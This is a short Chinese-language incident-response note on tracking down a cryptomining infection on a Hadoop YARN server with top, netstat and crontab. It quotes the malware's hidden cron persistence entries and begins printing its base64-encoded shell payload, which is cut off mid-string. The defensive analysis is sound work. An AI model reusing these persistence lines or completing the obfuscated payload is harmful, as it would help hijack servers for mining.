1 用top 命令查询一下进程信息
pid : 43581 就是挖矿病毒进程,占用大量cpu
2 用 netstat -tunp 查询ip 端口 信息
发现 : 94.176.237.229来自罗马尼亚, 有问题的ip
3 系统的crontab –l显示调度列表如下:
crontab -u yarn -e
20 * * * * /root/.aliyun.sh >/dev/null 2>&1
48 * * * * /var/lib/hadoop-yarn/.systemd-service.sh > /dev/null 2>&1
这个每个人可能不同,一般都是在定时任务里去查询就可以
4 找到 这个目录下的 sh文件 ,内容如下
echo bmFoRU9VY0NmcTlZcnN0UVdyS2l4MnFjT3lTcDRXcW4KZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUE